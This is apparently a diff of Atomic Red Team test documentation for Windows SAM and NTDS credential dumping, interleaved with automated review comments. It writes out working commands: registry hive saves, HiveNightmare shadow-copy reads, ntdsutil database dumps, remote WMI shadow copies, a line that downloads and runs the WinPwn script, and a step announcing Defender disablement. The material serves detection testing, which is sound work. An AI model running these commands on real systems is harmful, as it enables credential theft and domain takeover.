> Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
>
> A number of tools can be used to retrieve the SAM file through in-memory techniques:
>
> * pwdumpx.exe
> * [gsecdump](https://attack.mitre.org/software/S0008)
> * [Mimikatz](https://attack.mitre.org/software/S0002)
> * secretsdump.py
>
> Alternatively, the SAM can be extracted from the Registry with Reg:
>
> * <code>reg save HKLM\sam sam</code>
> * <code>reg save HKLM\system system</code>
>
> Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
>
> Notes:
>
> * RID 500 account is the local, built-in administrator.
> * RID 501 is the guest account.
> * User accounts start with a RID of 1,000+.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
[Source](https://attack.mitre.org/techniques/T1003/002)
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Registry dump of SAM, creds, and secrets](#atomic-test-1-registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2: Registry parse with pypykatz](#atomic-test-2-registry-parse-with-pypykatz)
- [Atomic Test #3: esentutl.exe SAM copy](#atomic-test-3-esentutlexe-sam-copy)
- [Atomic Test #4: PowerDump Hashes and Usernames from Registry](#atomic-test-4-powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5: dump volume shadow copy hives with certutil](#atomic-test-5-dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6: dump volume shadow copy hives with System.IO.File](#atomic-test-6-dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7-winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
- [Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8-dumping-of-sam-creds-and-secretsreg-export)
- [Atomic Test #1 - Registry dump of SAM, creds, and secrets](#atomic-test-1---registry-dump-of-sam-creds-and-secrets)
### Atomic Test #1: Registry dump of SAM, creds, and secrets
- [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)
- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
- [Atomic Test #4 - PowerDump Hashes and Usernames from Registry](#atomic-test-4---powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
- [Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8---dumping-of-sam-creds-and-secretsreg-export)
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
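Review bot: changing the test headings from `### Atomic Test #1: ...` to `## Atomic Test #1 - ...` changes the GitHub-generated anchors, from `#atomic-test-1-registry-dump-of-sam-creds-and-secrets` to `#atomic-test-1---registry-dump-of-sam-creds-and-secrets`. The in-page table of contents is regenerated to match, but any external links to the old anchors now break and GitHub does not redirect them; if the rename is intentional it deserves a mention in the commit message, which currently reads only "python conversion". The `<blockquote>` wrapper and the `## [Description from ATT&CK](...)` link heading are replaced by a `>` quote plus a separate `[Source](...)` line; the closing `</blockquote>` is removed in this hunk, so the structure stays well-formed.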
@@ -46,9 +56,16 @@ Upon successful execution of this test, you will find three files named, sam, sy
**Supported Platforms:** Windows
**auto_generated_guid:** `5c2571d0-1572-416d-9676-812e64ca9f44`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg save HKLM\sam %temp%\sam
@@ -56,119 +73,142 @@ reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
### Atomic Test #2: Registry parse with pypykatz
<br/>
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
**Supported Platforms:** Windows
**auto_generated_guid:** `a96872b2-cbf3-46cf-8eb4-27e8c0e85263`
#### Inputs
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{venv_path}\Scripts\pypykatz" live lsa
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have venv configured at #{venv_path}
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
py -m venv "#{venv_path}"
```
##### Description: pypykatz must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```
### Atomic Test #3: esentutl.exe SAM copy
<br/>
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** `a90c2f4d-6726-444e-99d2-a00cd7c20480`
#### Inputs
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | string | SAM|
| copy_dest | Destination of the copied file | string | %temp%|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
### Atomic Test #4: PowerDump Hashes and Usernames from Registry
<br/>
<br/>
## Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** `804f28fc-68fc-40da-b5a2-e9d0bce5c193`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
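Review bot: test #2 is titled "Registry parse with pypykatz" and its description says it "Parses registry hives to obtain stored credentials", but the attack command is `"#{venv_path}\Scripts\pypykatz" live lsa`, the same LSASS command as T1003.001 test #7; pypykatz's registry mode is `pypykatz live registry`. As written this test exercises LSASS memory (T1003.001), not the SAM. Minor: the esentutl test writes to `#{copy_dest}/#{file_name}` with a forward slash and cleans up `#{copy_dest}\#{file_name}` with a backslash; both work on Windows but they should match.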
@@ -177,66 +217,86 @@ Invoke-PowerDump
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
```
### Atomic Test #5: dump volume shadow copy hives with certutil
<br/>
<br/>
## Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** `eeb9751a-d598-42d3-b11c-c122d9c3f6c7`
#### Inputs
**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```
### Atomic Test #6: dump volume shadow copy hives with System.IO.File
<br/>
<br/>
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** `9d77fed7-05f8-476e-a81b-8ff0472c64d0`
#### Inputs
**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
1..#{limit} | % {
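Review bot: test #4's attack block opens with `Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON"`, yet the test has no Cleanup Commands block; the section goes straight from the attack fence to Dependencies. If the attack commands disable Defender real-time monitoring as that line announces, a host running this test is left with real-time protection off afterwards. Add a cleanup that re-enables it, and say so in the description.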
@@ -245,38 +305,65 @@ Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https
}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
### Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
<br/>
<br/>
## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** `0c0f5f06-166a-4f4d-bb4a-719df9a01dbb`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```
### Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)
<br/>
<br/>
## Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** `21df41be-cdd8-4695-a650-c3981113aa3c`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 21df41be-cdd8-4695-a650-c3981113aa3c
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg export HKLM\sam %temp%\sam
@@ -284,10 +371,15 @@ reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
<br/>
+197 -178
View File
@@ -1,75 +1,92 @@
# T1003.003 - OS Credential Dumping: NTDS
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
> Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
>
> In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
>
> The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
>
> * Volume Shadow Copy
> * secretsdump.py
> * Using the in-built Windows tool, ntdsutil.exe
> * Invoke-NinjaCopy
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
[Source](https://attack.mitre.org/techniques/T1003/003)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</blockquote>
## Atomic Tests
- [Atomic Test #1: Create Volume Shadow Copy with vssadmin](#atomic-test-1-create-volume-shadow-copy-with-vssadmin)
- [Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2-copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #3: Dump Active Directory Database with NTDSUtil](#atomic-test-3-dump-active-directory-database-with-ntdsutil)
- [Atomic Test #4: Create Volume Shadow Copy with WMI](#atomic-test-4-create-volume-shadow-copy-with-wmi)
- [Atomic Test #5: Create Volume Shadow Copy remotely with WMI](#atomic-test-5-create-volume-shadow-copy-remotely-with-wmi)
- [Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6-create-volume-shadow-copy-remotely-wmi-with-esentutl)
- [Atomic Test #7: Create Volume Shadow Copy with Powershell](#atomic-test-7-create-volume-shadow-copy-with-powershell)
- [Atomic Test #8: Create Symlink to Volume Shadow Copy](#atomic-test-8-create-symlink-to-volume-shadow-copy)
- [Atomic Test #9: Create Volume Shadow Copy with diskshadow](#atomic-test-9-create-volume-shadow-copy-with-diskshadow)
- [Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10-copy-ntds-in-low-level-ntfs-acquisition-via-mft-parsing)
- [Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11-copy-ntds-in-low-level-ntfs-acquisition-via-fsutil)
- [Atomic Test #1 - Create Volume Shadow Copy with vssadmin](#atomic-test-1---create-volume-shadow-copy-with-vssadmin)
### Atomic Test #1: Create Volume Shadow Copy with vssadmin
- [Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
- [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)
- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
<br/>
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f`
#### Inputs
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | string | C:|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
### Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy
<br/>
<br/>
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
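Review bot: the two sides of the Atomic Tests index differ in content, not only in heading and anchor format: one lists Atomic Test #10 and #11 (the UnderlayCopy tests) and the other stops at #9. This index is generated from the YAML, and the YAML hunk further down in this diff removes exactly those two tests, so confirm the generator was run against the intended YAML rather than a stale checkout, and if dropping the tests is intended, state that in the commit message instead of folding it into a "python conversion" commit. Note also that moving between `## Atomic Test #1 - ...` and `### Atomic Test #1: ...` changes the slug from `#atomic-test-1---create-volume-shadow-copy-with-vssadmin` to `#atomic-test-1-create-volume-shadow-copy-with-vssadmin`, so any external links into these files break for whichever form is abandoned.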
@@ -80,16 +97,22 @@ This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** `c6237146-9ea6-4711-85c9-c56d263a6b03`
#### Inputs
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | string | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
@@ -97,60 +120,51 @@ copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
if not exist #{vsc_name} (exit /b 1)
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
```
##### Description: Extract path must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
if not exist #{extract_path} (exit /b 1)
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
mkdir #{extract_path}
```
### Atomic Test #3: Dump Active Directory Database with NTDSUtil
<br/>
<br/>
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -161,290 +175,295 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
**Supported Platforms:** Windows
**auto_generated_guid:** `2364e33d-ceab-4641-8468-bfb1d7cc2723`
#### Inputs
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
rmdir /q /s #{output_folder} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
### Atomic Test #4: Create Volume Shadow Copy with WMI
<br/>
<br/>
## Atomic Test #4 - Create Volume Shadow Copy with WMI
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `224f7de0-8f0a-4a94-b5d8-989b036c86da`
#### Inputs
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
### Atomic Test #5: Create Volume Shadow Copy remotely with WMI
<br/>
<br/>
## Atomic Test #5 - Create Volume Shadow Copy remotely with WMI
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `d893459f-71f0-484d-9808-ec83b2b64226`
#### Inputs
**auto_generated_guid:** d893459f-71f0-484d-9808-ec83b2b64226
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|
| target_host | IP Address / Hostname you want to target | string | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
### Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl
<br/>
<br/>
## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
**Supported Platforms:** Windows
**auto_generated_guid:** `21c7bf80-3e8b-40fa-8f9d-f5b194ff2865`
#### Inputs
**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_path | File to shadow copy | string | c:&#92;windows&#92;ntds&#92;ntds.dit|
| target_path | Target path of the result file | string | c:&#92;ntds.dit|
| target_host | IP Address / Hostname you want to target | string | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
### Atomic Test #7: Create Volume Shadow Copy with Powershell
<br/>
<br/>
## Atomic Test #7 - Create Volume Shadow Copy with Powershell
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `542bb97e-da53-436b-8e43-e0a7d31a6c24`
#### Inputs
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | string | C:&#92;|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
```
### Atomic Test #8: Create Symlink to Volume Shadow Copy
<br/>
<br/>
## Atomic Test #8 - Create Symlink to Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `21748c28-2793-4284-9e07-d6d028b66702`
#### Inputs
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | string | C:|
| symlink_path | symlink path | string | C:&#92;Temp&#92;vssstore|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
```
### Atomic Test #9: Create Volume Shadow Copy with diskshadow
<br/>
<br/>
